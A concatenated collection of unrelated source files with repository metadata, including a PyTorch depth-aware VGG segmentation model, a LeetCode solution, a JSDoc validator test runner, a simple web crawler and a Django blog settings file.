self.conv3_3 = ConvModule(256, 256, bn=batch_norm, maxpool=True)
if self.depthconv:
self.conv4_1_depthconvweight = 1.#nn.Parameter(torch.ones(1))
self.downsample_depth4_1 = nn.AvgPool2d(3,padding=1,stride=2)
self.conv4_1 = DepthConvModule(256, 512, bn=batch_norm)
else:
self.conv4_1 = ConvModule(256, 512, bn=batch_norm)
self.conv4_2 = ConvModule(512, 512, bn=batch_norm)
self.conv4_3 = ConvModule(512, 512, bn=batch_norm,
maxpool=True, pool_kernel=3, pool_stride=1, pool_pad=1)
if self.depthconv:
self.conv5_1_depthconvweight = 1.#nn.Parameter(torch.ones(1))
self.conv5_1 = DepthConvModule(512, 512, bn=batch_norm,dilation=2,padding=2)
else:
self.conv5_1 = ConvModule(512, 512, bn=batch_norm, dilation=2, padding=2)
self.conv5_2 = ConvModule(512, 512, bn=batch_norm, dilation=2, padding=2)
self.conv5_3 = ConvModule(512, 512, bn=batch_norm, dilation=2, padding=2,
maxpool=True, pool_kernel=3, pool_stride=1, pool_pad=1)
self.pool5a = nn.AvgPool2d(kernel_size=3, stride=1,padding=1)
def forward(self, x, depth=None):
x = self.conv1_1(x)
x = self.conv1_2(x)
depth = self.downsample_depth2_1(depth)
x = self.conv2_1(x)
x = self.conv2_2(x)
depth = self.downsample_depth3_1(depth)
x = self.conv3_1(x)
x = self.conv3_2(x)
x = self.conv3_3(x)
if self.depthconv:
depth = self.downsample_depth4_1(depth)
x = self.conv4_1(x, self.conv4_1_depthconvweight * depth)
else:
x = self.conv4_1(x)
x = self.conv4_2(x)
x = self.conv4_3(x)
if self.depthconv:
x = self.conv5_1(x, self.conv5_1_depthconvweight * depth)
else:
x = self.conv5_1(x)
x = self.conv5_2(x)
x = self.conv5_3(x)
x = self.pool5a(x)
return x, depth
class VGG_layer(nn.Module):
def __init__(self, batch_norm=False, depthconv=False):
super(VGG_layer, self).__init__()
self.depthconv = depthconv
if self.depthconv:
self.conv1_1_depthconvweight = 1.#nn.Parameter(torch.ones(1))
self.conv1_1 = DepthConvModule(3, 64, bn=batch_norm)
else:
self.conv1_1 = ConvModule(3, 64, bn=batch_norm)
self.conv1_2 = ConvModule(64, 64, bn=batch_norm, maxpool=True)
if self.depthconv:
self.conv2_1_depthconvweight = 1.#nn.Parameter(torch.ones(1))
self.downsample_depth2_1 = nn.AvgPool2d(3,padding=1,stride=2)
self.conv2_1 = DepthConvModule(64, 128, bn=batch_norm)
else:
self.conv2_1 = ConvModule(64, 128, bn=batch_norm)
self.conv2_2 = ConvModule(128, 128, bn=batch_norm, maxpool=True)
if self.depthconv:
self.conv3_1_depthconvweight = 1.#nn.Parameter(torch.ones(1))
self.downsample_depth3_1 = nn.AvgPool2d(3,padding=1,stride=2)
self.conv3_1 = DepthConvModule(128, 256, bn=batch_norm)
else:
self.conv3_1 = ConvModule(128, 256, bn=batch_norm)
self.conv3_2 = ConvModule(256, 256, bn=batch_norm)
self.conv3_3 = ConvModule(256, 256, bn=batch_norm, maxpool=True)
if self.depthconv:
self.conv4_1_depthconvweight = 1.#nn.Parameter(torch.ones(1))
self.downsample_depth4_1 = nn.AvgPool2d(3,padding=1,stride=2)
self.conv4_1 = DepthConvModule(256, 512, bn=batch_norm)
else:
self.conv4_1 = ConvModule(256, 512, bn=batch_norm)
self.conv4_2 = ConvModule(512, 512, bn=batch_norm)
self.conv4_3 = ConvModule(512, 512, bn=batch_norm,
maxpool=True, pool_kernel=3, pool_stride=1, pool_pad=1)
if self.depthconv:
self.conv5_1_depthconvweight = 1.#nn.Parameter(torch.ones(1))
self.conv5_1 = DepthConvModule(512, 512, bn=batch_norm,dilation=2,padding=2)
else:
self.conv5_1 = ConvModule(512, 512, bn=batch_norm, dilation=2, padding=2)
self.conv5_2 = ConvModule(512, 512, bn=batch_norm, dilation=2, padding=2)
self.conv5_3 = ConvModule(512, 512, bn=batch_norm, dilation=2, padding=2,
maxpool=True, pool_kernel=3, pool_stride=1, pool_pad=1)
self.pool5a = nn.AvgPool2d(kernel_size=3, stride=1,padding=1)
self.pool5a_d = Depthavgpooling(kernel_size=3, stride=1,padding=1)
def forward(self, x, depth=None):
if self.depthconv:
x = self.conv1_1(x,self.conv1_1_depthconvweight * depth)
else:
x = self.conv1_1(x)
x = self.conv1_2(x)
if self.depthconv:
depth = self.downsample_depth2_1(depth)
x = self.conv2_1(x, self.conv2_1_depthconvweight * depth)
else:
x = self.conv2_1(x)
# print 'xxxxxx',x.size()
x = self.conv2_2(x)
if self.depthconv:
depth = self.downsample_depth3_1(depth)
x = self.conv3_1(x, self.conv3_1_depthconvweight * depth)
else:
x = self.conv3_1(x)
x = self.conv3_2(x)
x = self.conv3_3(x)
if self.depthconv:
depth = self.downsample_depth4_1(depth)
x = self.conv4_1(x, self.conv4_1_depthconvweight * depth)
else:
x = self.conv4_1(x)
x = self.conv4_2(x)
x = self.conv4_3(x)
if self.depthconv:
x = self.conv5_1(x, self.conv5_1_depthconvweight * depth)
else:
x = self.conv5_1(x)
x = self.conv5_2(x)
x = self.conv5_3(x)
if self.depthconv:
x = self.pool5a_d(x,depth)
else:
x = self.pool5a(x)
return x, depth
class Classifier_Module(nn.Module):
def __init__(self, num_classes, inplanes, depthconv=False):
super(Classifier_Module, self).__init__()
# [6, 12, 18, 24]
self.depthconv = depthconv
if depthconv:
self.fc6_1_depthconvweight = 1.#nn.Parameter(torch.ones(1))
self.fc6_1 = DepthConv(inplanes, 1024, kernel_size=3, stride=1, padding=6, dilation=6) # fc6
else:
self.fc6_1 = nn.Conv2d(inplanes, 1024, kernel_size=3, stride=1, padding=6, dilation=6) # fc6
self.fc7_1 = nn.Sequential(
*[nn.ReLU(True), nn.Dropout(),
nn.Conv2d(1024, 1024, kernel_size=1, stride=1), nn.ReLU(True), nn.Dropout()]) # fc7
self.fc8_1 = nn.Conv2d(1024, num_classes, kernel_size=1, stride=1, bias=True) # fc8
if depthconv:
self.fc6_2_depthconvweight = 1.#nn.Parameter(torch.ones(1))
self.fc6_2 = DepthConv(inplanes, 1024, kernel_size=3, stride=1, padding=12, dilation=12) # fc6
else:
self.fc6_2 = nn.Conv2d(inplanes, 1024, kernel_size=3, stride=1, padding=12, dilation=12) # fc6
self.fc7_2 = nn.Sequential(
*[nn.ReLU(True), nn.Dropout(),
nn.Conv2d(1024, 1024, kernel_size=1, stride=1), nn.ReLU(True), nn.Dropout()]) # fc7
self.fc8_2 = nn.Conv2d(1024, num_classes, kernel_size=1, stride=1, bias=True) # fc8
if depthconv:
self.fc6_3_depthconvweight = 1.#nn.Parameter(torch.ones(1))
self.fc6_3 = DepthConv(inplanes, 1024, kernel_size=3, stride=1, padding=18, dilation=18) # fc6
else:
self.fc6_3 = nn.Conv2d(inplanes, 1024, kernel_size=3, stride=1, padding=18, dilation=18) # fc6
self.fc7_3 = nn.Sequential(
*[nn.ReLU(True), nn.Dropout(),
nn.Conv2d(1024, 1024, kernel_size=1, stride=1), nn.ReLU(True), nn.Dropout()]) # fc7
self.fc8_3 = nn.Conv2d(1024, num_classes, kernel_size=1, stride=1, bias=True) # fc8
if depthconv:
self.fc6_4_depthconvweight = 1.#nn.Parameter(torch.ones(1))
self.fc6_4 = DepthConv(inplanes, 1024, kernel_size=3, stride=1, padding=24, dilation=24) # fc6
else:
self.fc6_4 = nn.Conv2d(inplanes, 1024, kernel_size=3, stride=1, padding=24, dilation=24) # fc6
self.fc7_4 = nn.Sequential(
*[nn.ReLU(True), nn.Dropout(),
nn.Conv2d(1024, 1024, kernel_size=1, stride=1), nn.ReLU(True), nn.Dropout()]) # fc7
self.fc8_4 = nn.Conv2d(1024, num_classes, kernel_size=1, stride=1, bias=True) # fc8
def forward(self, x, depth=None):
if self.depthconv:
out1 = self.fc6_1(x, self.fc6_1_depthconvweight * depth)
else:
out1 = self.fc6_1(x)
out1 = self.fc7_1(out1)
out1 = self.fc8_1(out1)
if self.depthconv:
out2 = self.fc6_2(x, self.fc6_2_depthconvweight * depth)
else:
out2 = self.fc6_2(x)
out2 = self.fc7_2(out2)
out2 = self.fc8_2(out2)
if self.depthconv:
out3 = self.fc6_3(x, self.fc6_3_depthconvweight * depth)
else:
out3 = self.fc6_3(x)
out3 = self.fc7_3(out3)
out3 = self.fc8_3(out3)
if self.depthconv:
out4 = self.fc6_4(x, self.fc6_4_depthconvweight * depth)
else:
out4 = self.fc6_4(x)
out4 = self.fc7_4(out4)
out4 = self.fc8_4(out4)
return out1+out2+out3+out4
class Classifier_Module2(nn.Module):
def __init__(self, num_classes, inplanes, depthconv=False):
super(Classifier_Module2, self).__init__()
# [6, 12, 18, 24]
self.depthconv = depthconv
if depthconv:
self.fc6_2_depthconvweight = 1.#nn.Parameter(torch.ones(1))
self.fc6_2 = DepthConv(inplanes, 1024, kernel_size=3, stride=1, padding=12, dilation=12)
self.downsample_depth = None
else:
self.downsample_depth = nn.AvgPool2d(9,padding=1,stride=8)
self.fc6_2 = nn.Conv2d(inplanes, 1024, kernel_size=3, stride=1, padding=12, dilation=12) # fc6
self.fc7_2 = nn.Sequential(
*[nn.ReLU(True), nn.Dropout(),
nn.Conv2d(1024, 1024, kernel_size=1, stride=1), nn.ReLU(True), nn.Dropout()]) # fc7
# self.globalpooling = DepthGlobalPool(1024,3)#
# self.fc8_2 = nn.Conv2d(1024+3, num_classes, kernel_size=1, stride=1, bias=True) # fc8
self.globalpooling = nn.AdaptiveAvgPool2d((1, 1))#nn.AvgPool2d((54,71))#
self.dropout = nn.Dropout(0.3)
# self.norm = CaffeNormalize(1024)#LayerNorm(1024)#nn.InstanceNorm2d(1024).use_running_stats(mode=False)
self.fc8_2 = nn.Conv2d(2048, num_classes, kernel_size=1, stride=1, bias=True) # fc8
def forward(self, x, depth=None):
if self.depthconv:
out2 = self.fc6_2(x, self.fc6_2_depthconvweight * depth)
else:
out2 = self.fc6_2(x)
out2 = self.fc7_2(out2)
out2_size = out2.size()
#global pooling
globalpool = self.globalpooling(out2)
# globalpool = self.dropout(self.norm(globalpool))
globalpool = self.dropout(globalpool)#self.norm(globalpool))
upsample = nn.Upsample((out2_size[2],out2_size[3]), mode='bilinear', align_corners=True)#scale_factor=8)
globalpool = upsample(globalpool)
#global pooling with depth
# globalpool = self.globalpooling(out2,depth)
# print globalpool.mean()
out2 = torch.cat([out2, globalpool], 1)
out2 = self.fc8_2(out2)
# print out2.size()
return out2
class VGG(nn.Module):
def __init__(self, num_classes=20, init_weights=True, depthconv=False,bn=False):
super(VGG, self).__init__()
self.features = VGG_layer(batch_norm=bn,depthconv=depthconv)
self.classifier = Classifier_Module2(num_classes,512,depthconv=depthconv)
if init_weights:
self._initialize_weights()
def forward(self, x, depth=None):
x,depth = self.features(x,depth)
x = self.classifier(x,depth)
return x
def _initialize_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
if m.bias is not None:
m.bias.data.zero_()
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
elif isinstance(m, nn.Linear):
m.weight.data.normal_(0, 0.01)
m.bias.data.zero_()
def get_normalize_params(self):
b=[]
b.append(self.classifier.norm)
for i in b:
if isinstance(i, CaffeNormalize):
yield i.scale
def get_1x_lr_params_NOscale(self):
"""
This generator returns all the parameters of the net except for
the last classification layer. Note that for each batchnorm layer,
requires_grad is set to False in deeplab_resnet.py, therefore this function does not return
any batchnorm parameter
"""
b = []
b.append(self.features.conv1_1)
b.append(self.features.conv1_2)
b.append(self.features.conv2_1)
b.append(self.features.conv2_2)
b.append(self.features.conv3_1)
b.append(self.features.conv3_2)
b.append(self.features.conv3_3)
b.append(self.features.conv4_1)
b.append(self.features.conv4_2)
b.append(self.features.conv4_3)
b.append(self.features.conv5_1)
b.append(self.features.conv5_2)
b.append(self.features.conv5_3)
# b.append(self.classifier.fc6_1)
b.append(self.classifier.fc6_2)
# b.append(self.classifier.norm)
# b.append(self.classifier.fc6_3)
# b.append(self.classifier.fc6_4)
# b.append(self.classifier.fc7_1)
b.append(self.classifier.fc7_2)
# b.append(self.classifier.fc7_3)
# b.append(self.classifier.fc7_4)
for i in range(len(b)):
for j in b[i].modules():
if isinstance(j, nn.Conv2d):
if j.weight.requires_grad:
yield j.weight
elif isinstance(j, DepthConv):
if j.weight.requires_grad:
yield j.weight
def get_2x_lr_params_NOscale(self):
"""
This generator returns all the parameters of the net except for
the last classification layer. Note that for each batchnorm layer,
requires_grad is set to False in deeplab_resnet.py, therefore this function does not return
any batchnorm parameter
"""
b = []
b.append(self.features.conv1_1)
b.append(self.features.conv1_2)
b.append(self.features.conv2_1)
b.append(self.features.conv2_2)
b.append(self.features.conv3_1)
b.append(self.features.conv3_2)
b.append(self.features.conv3_3)
b.append(self.features.conv4_1)
b.append(self.features.conv4_2)
b.append(self.features.conv4_3)
b.append(self.features.conv5_1)
b.append(self.features.conv5_2)
b.append(self.features.conv5_3)
# b.append(self.classifier.fc6_1)
b.append(self.classifier.fc6_2)
# b.append(self.classifier.fc6_3)
# b.append(self.classifier.fc6_4)
# b.append(self.classifier.fc7_1)
b.append(self.classifier.fc7_2)
# b.append(self.classifier.globalpooling.model)
# b.append(self.classifier.fc7_3)
# b.append(self.classifier.fc7_4)
for i in range(len(b)):
for j in b[i].modules():
if isinstance(j, nn.Conv2d):
if j.bias is not None:
if j.bias.requires_grad:
yield j.bias
elif isinstance(j, DepthConv):
if j.bias is not None:
if j.bias.requires_grad:
yield j.bias
def get_10x_lr_params(self):
"""
This generator returns all the parameters for the last layer of the net,
which does the classification of pixel into classes
"""
b = []
# b.append(self.classifier.fc8_1.weight)
b.append(self.classifier.fc8_2.weight)
# b.append(self.classifier.globalpooling.model.weight)
# b.append(self.classifier.fc8_3.weight)
# b.append(self.classifier.fc8_4.weight)
for i in b:
yield i
# for j in range(len(b)):
# for i in b[j]:
# yield i
def get_20x_lr_params(self):
"""
This generator returns all the parameters for the last layer of the net,
which does the classification of pixel into classes
"""
b = []
# b.append(self.classifier.fc8_1.bias)
b.append(self.classifier.fc8_2.bias)
# b.append(self.classifier.globalpooling.model.bias)
# b.append(self.classifier.fc8_3.bias)
# b.append(self.classifier.fc8_4.bias)
for i in b:
yield i
# for j in range(len(b)):
# for i in b[j]:
# yield i
def get_100x_lr_params(self):
"""
This generator returns all the parameters for the last layer of the net,
which does the classification of pixel into classes
"""
b = []
b.append(self.features.conv1_1_depthconvweight)
b.append(self.features.conv2_1_depthconvweight)
b.append(self.features.conv3_1_depthconvweight)
b.append(self.features.conv4_1_depthconvweight)
b.append(self.features.conv5_1_depthconvweight)
b.append(self.classifier.fc6_1_depthconvweight)
b.append(self.classifier.fc6_2_depthconvweight)
b.append(self.classifier.fc6_3_depthconvweight)
b.append(self.classifier.fc6_4_depthconvweight)
for j in range(len(b)):
yield b[j]
# for i in b[j]:
# yield i
def vgg16(pretrained=False, **kwargs):
"""VGG 16-layer model (configuration "D")
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
"""
if pretrained:
kwargs['init_weights'] = False
model = VGG(bn=False,**kwargs)
if pretrained:
model.load_state_dict(model_zoo.load_url(model_urls['vgg16']))
return model
def vgg16_bn(pretrained=False, **kwargs):
"""VGG 16-layer model (configuration "D") with batch normalization
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
"""
if pretrained:
kwargs['init_weights'] = False
model = VGG(bn=True,**kwargs)
if pretrained:
model.load_state_dict(model_zoo.load_url(model_urls['vgg16_bn']))
return model
| [
"you@example.com"
] | you@example.com |
6044707a842d423d814ff79bbe88165aa85c6a63 | 036a41c913b3a4e7ae265e22a672dd89302d3200 | /0201-0300/0202/0202_Python_1.py | 824b7df04f6dc998ee5063168448cdd780ec660e | [] | no_license | ChangxingJiang/LeetCode | e76f96ebda68d7ade53575354479cfc33ad4f627 | a2209206cdd7229dd33e416f611e71a984a8dd9e | refs/heads/master | 2023-04-13T15:23:35.174390 | 2021-04-24T05:54:14 | 2021-04-24T05:54:14 | 272,088,506 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 332 | py | class Solution:
def isHappy(self, n: int) -> bool:
already = set()
while n != 1:
if n in already:
return False
already.add(n)
n = sum([int(x) * int(x) for x in str(n)])
return True
if __name__ == "__main__":
print(Solution().isHappy(19)) # True
| [
"1278729001@qq.com"
] | 1278729001@qq.com |
fe3a796bb288f2ea2a15f6a1831131ee1055515f | 641fa8341d8c436ad24945bcbf8e7d7d1dd7dbb2 | /third_party/WebKit/Source/devtools/scripts/jsdoc_validator/run_tests.py | c2625381bf84c0386fa8f16a076d312a87ec7283 | [
"LGPL-2.0-or-later",
"LicenseRef-scancode-warranty-disclaimer",
"LGPL-2.1-only",
"GPL-1.0-or-later",
"GPL-2.0-only",
"LGPL-2.0-only",
"BSD-2-Clause",
"LicenseRef-scancode-other-copyleft",
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | permissive | massnetwork/mass-browser | 7de0dfc541cbac00ffa7308541394bac1e945b76 | 67526da9358734698c067b7775be491423884339 | refs/heads/master | 2022-12-07T09:01:31.027715 | 2017-01-19T14:29:18 | 2017-01-19T14:29:18 | 73,799,690 | 4 | 4 | BSD-3-Clause | 2022-11-26T11:53:23 | 2016-11-15T09:49:29 | null | UTF-8 | Python | false | false | 2,142 | py | #!/usr/bin/python
import hashlib
import operator
import os
import shutil
import stat
import subprocess
import sys
import tempfile
def rel_to_abs(rel_path):
return os.path.join(script_path, rel_path)
java_exec = 'java -Xms1024m -server -XX:+TieredCompilation'
tests_dir = 'tests'
jar_name = 'jsdoc_validator.jar'
script_path = os.path.dirname(os.path.abspath(__file__))
tests_path = rel_to_abs(tests_dir)
validator_jar_file = rel_to_abs(jar_name)
golden_file = os.path.join(tests_path, 'golden.dat')
test_files = [os.path.join(tests_path, f) for f in os.listdir(tests_path) if f.endswith('.js') and os.path.isfile(os.path.join(tests_path, f))]
validator_command = "%s -jar %s %s" % (java_exec, validator_jar_file, " ".join(sorted(test_files)))
def run_and_communicate(command, error_template):
proc = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True)
(out, _) = proc.communicate()
if proc.returncode:
print >> sys.stderr, error_template % proc.returncode
sys.exit(proc.returncode)
return out
def help():
print 'usage: %s [option]' % os.path.basename(__file__)
print 'Options:'
print '--generate-golden: Re-generate golden file'
print '--dump: Dump the test results to stdout'
def main():
need_golden = False
need_dump = False
if len(sys.argv) > 1:
if sys.argv[1] == '--generate-golden':
need_golden = True
elif sys.argv[1] == '--dump':
need_dump = True
else:
help()
return
result = run_and_communicate(validator_command, "Error running validator: %d")
result = result.replace(script_path, "") # pylint: disable=E1103
if need_dump:
print result
return
if need_golden:
with open(golden_file, 'wt') as golden:
golden.write(result)
else:
with open(golden_file, 'rt') as golden:
golden_text = golden.read()
if golden_text == result:
print 'OK'
else:
print 'ERROR: Golden output mismatch'
if __name__ == '__main__':
main()
| [
"xElvis89x@gmail.com"
] | xElvis89x@gmail.com |
c006e1eef801f0d6aca2fd0af66ee80890b5f2fd | 9a9d6052f8cf91dd57be9a9b6564290b0fac9e52 | /Algorithm/JUNGOL/1. Language_Coder/반복제어문1/539_반복제어문1_자가진단4.py | 00e86ec0148550177bbba5b7f69cc431292e6dbc | [] | no_license | Gyeong-Yeon/TIL | 596ec6a093eec34a17dad68bcd91fa9dd08690e8 | eb1f43ee0525da93233b70716cd35caab8d82bda | refs/heads/master | 2023-03-31T19:56:30.979062 | 2021-03-28T13:09:27 | 2021-03-28T13:09:27 | 280,307,737 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 226 | py | input_li = list(map(int,input().split()))
i = 0
sum = 0
cnt = 0
for i in range(len(input_li)):
sum += input_li[i]
cnt += 1
if input_li[i] >= 100:
break
avg = sum / cnt
print(sum)
print("%0.1f" % (avg)) | [
"lky4156@naver.com"
] | lky4156@naver.com |
c2b29c30a1ad0e3e08788fff8ef7b6a2ca24bc5c | 6ab217b675b0d33dec9d8985efc2de314e3a7a28 | /menus/models/menu/__init__.py | a40593ebbc06d8b54c15b200eb232c440c133755 | [] | no_license | nujkram/dream_cream_pastries | 3547928af859ebbb93f8d6ff64d02796d8c61a0c | c6a764f4f2c16191661ee6747dc0daa896eae5ec | refs/heads/master | 2023-06-20T20:20:21.001373 | 2021-07-29T00:55:49 | 2021-07-29T00:55:49 | 375,721,861 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 87 | py | from .models import Menu
from .managers import MenuManager
from .admin import MenuAdmin | [
"markjungersaniva@gmail.com"
] | markjungersaniva@gmail.com |
4212810827fc696d2f652d89c4fb5a3ca5b8bcbf | dc222b7713453f4653da00fa8ce7a76d89c51e68 | /python_test/src/templates/crawler_2.py | 92f75f12a72f6a7c9bd5ddda0e469298768b28d1 | [] | no_license | aimeiyan/exercise | d935d48ddab90c55b8b9ac89e821abf117d5f609 | 617261af69db836a649bd4044f97bec7ab3e845d | refs/heads/master | 2020-05-20T11:36:34.698664 | 2014-02-18T11:27:44 | 2014-02-18T11:27:44 | 10,766,847 | 0 | 3 | null | null | null | null | UTF-8 | Python | false | false | 993 | py | __author__ = 'nancy'
from urllib import urlopen
from bs4 import BeautifulSoup
from urlparse import urlparse, urljoin
def get_and_extract_links(url):
html = urlopen(url).read()
soup = BeautifulSoup(html)
hrefs = soup.find_all('a')
urls = []
for a in hrefs:
href = a.get('href')
if href:
href = href.strip()
if href:
u = urljoin(url, href)
urls.append(u)
return urls
def main():
seed = "http://www.baidu.com"
url = seed
to_be_downloaded = [seed]
downloaded = set()
while to_be_downloaded:
url = to_be_downloaded.pop()
print "download", url, "has", len(to_be_downloaded), "urls remaining", "downloaded", len(downloaded)
urls = get_and_extract_links(url)
downloaded.add(url)
for url in urls:
if seed in url and url[:4] == 'http' and url in downloaded:
to_be_downloaded.append(url)
if __name__ == '__main__':
main() | [
"aimeiyan@gmail.com"
] | aimeiyan@gmail.com |
9bf1c1a1ea823c79a6bf67c90744c7510431225d | 304033f60097c489cbc60aab639be45ccdbef1a5 | /algorithms/boj/brute_force/10819.py | c441a9bdf62e955e7f1408980bc52b89a3bffe5c | [] | no_license | pgw928/TIL | 3d0c47c07bd1f5c73826daf8579a2b0e3f93cb95 | 765906f1e6eecad4ad8ec9bf704041433d7eb304 | refs/heads/master | 2023-06-29T05:46:30.039815 | 2021-08-10T17:38:11 | 2021-08-10T17:38:11 | 288,923,095 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 262 | py | import sys
from itertools import permutations
input = sys.stdin.readline
N = int(input())
A = list(map(int, input().split()))
M = 0
for perm in permutations(A):
tmp = [ abs(perm[i+1]-perm[i]) for i in range(len(perm)-1)]
M = max(sum(tmp), M)
print(M)
| [
"pku928@naver.com"
] | pku928@naver.com |
c5ee9bd2b4b5e9e1dff46626f83b49a5ac8d4516 | 95e9ec4b3b0d86063da53a0e62e138cf794cce3a | /webroot/py1902/py1902/settings.py | b7b4e02bf8a11be11851ad956f67c31f2b3fafe1 | [] | no_license | wjl626nice/1902 | c3d350d91925a01628c9402cbceb32ebf812e43c | 5a1a6dd59cdd903563389fa7c73a283e8657d731 | refs/heads/master | 2023-01-05T23:51:47.667675 | 2019-08-19T06:42:09 | 2019-08-19T06:42:09 | 180,686,044 | 4 | 1 | null | 2023-01-04T07:35:24 | 2019-04-11T00:46:43 | Python | UTF-8 | Python | false | false | 5,392 | py | """
Django settings for py1902 project.
Generated by 'django-admin startproject' using Django 2.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '*!b8$5*w^zcz$m@875#i(u2!21k9zz9=$j_s4zhfbw*2ypeh+f'
# SECURITY WARNING: don't run with debug turned on in production!
# 开发阶段 开启调试模式
DEBUG = True
# 设置允许请求的主机
ALLOWED_HOSTS = ['127.0.0.1', 'www.xuxin.com']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'manager.apps.ManagerConfig',
'Home.apps.HomeConfig',
'api.apps.ApiConfig',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'CheckLoginMW.CheckLoginMW'
]
ROOT_URLCONF = 'py1902.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')]
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
# 模板引擎初始化参数,在模板中可以直接使用。
'conf.global.auto_config'
],
},
},
]
WSGI_APPLICATION = 'py1902.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'p1_blog',
'HOST': '127.0.0.1',
'USER': 'root',
'PASSWORD': '123456',
'PORT': '3306'
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'zh-hans'
TIME_ZONE = 'Asia/shanghai'
USE_I18N = True
USE_L10N = True
USE_TZ = False
# 盐
SALT = 'qwsa12#'
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, 'static'),
]
# 媒体文件路径 别名
MEDIA_URL = '/uploads/'
# 指定媒体文件路径
# MEDIA_ROOT = os.path.join(BASE_DIR, 'uploads'),
# 后台菜单
MENU = [
{"id": "menu-article", "title": "文章管理", "url": '#', "icon": '', 'child': [
{"title": "栏目管理", "url": '/admin/category/'},
{"title": "文章列表", "url": '/admin/article/'}
]
},
{"id": "menu-picture", "title": "随手拍管理", "url": '#', "icon": '', 'child': [
{"title": "图片管理", "url": '#'},
]
},
{"id": "menu-banner", "title": "轮播图管理", "url": '#', "icon": '', 'child': [
{"title": "轮播图", "url": '#'},
]
},
{"id": "menu-comments", "title": "评论管理", "url": '#', "icon": '', 'child': [
{"title": "评论列表", "url": '#'}
]
},
{"id": "menu-system", "title": "系统管理", "url": '#', "icon": '', 'child': [
{"title": "系统设置", "url": '#'},
{"title": "管理员管理", "url": '/admin/manager/'},
{"title": "友情链接管理", "url": '/admin/links/'},
{"title": "留言管理", "url": '#'},
{"title": "屏蔽词", "url": '#'},
{"title": "操作日志", "url": '#'},
]
},
]
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'handlers': {
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
},
},
'loggers': {
'django': {
'handlers': ['console'],
'level': 'DEBUG',
'propagate': True,
},
},
}
# 极验id和key
GEETEST = {
'id': '4726b9849ea9f2493787a3fa247a9973',
'key': 'c264c310dbae53a1383770771408b473',
} | [
"18537160262@qq.com"
] | 18537160262@qq.com |
305dcded8a50a6e919ea59991bcdf5aeada117a3 | da1e8e6d9886cabe65887a5e2cfe3fe62c06a564 | /lab1/venv/bin/easy_install | ea69e4a6d164aa9262f47ff5cb644ba718f88864 | [] | no_license | serhiisad/Numerical_Analysis | d0f1a5ae652bf57354f472d3f239f23d4aae2a86 | acdc38d712011fdddc4bbb0aa6712d18745fdfc8 | refs/heads/master | 2020-04-16T04:49:08.128479 | 2019-01-11T17:29:16 | 2019-01-11T17:29:16 | 165,282,233 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 302 | #!/home/serhiisad/PycharmProjects/LABS_Numerical_Analysis_Onai/lab1/venv/bin/python2.7
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"serhiisad.kpi@gmail.com"
] | serhiisad.kpi@gmail.com | |
fefea20dda2cfe7903db5639fa9a63fd997584d3 | 182fe181687327d933aefa1b9f8779d7643430e4 | /code/cifar/gater_seq_prime_lenet.py | e37bed55693ae74138f39f9e137c53dfc848c28c | [
"MIT"
] | permissive | IDPSGitHubProjects/MixtureOfExperts | 503a399f32b78def4121fc73c892960144abb713 | ec43e312b3b3abddf0bd7281535842e73268b771 | refs/heads/master | 2022-11-01T15:26:39.765629 | 2020-06-16T12:45:01 | 2020-06-16T12:45:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,250 | py | #!/usr/bin/env python3
# TODO:
# Train Data
import sys
sys.path.append('../helper_utils')
sys.path.append('/home/kkalyan3/code/helper_utils')
from utils import load_array, eval_target
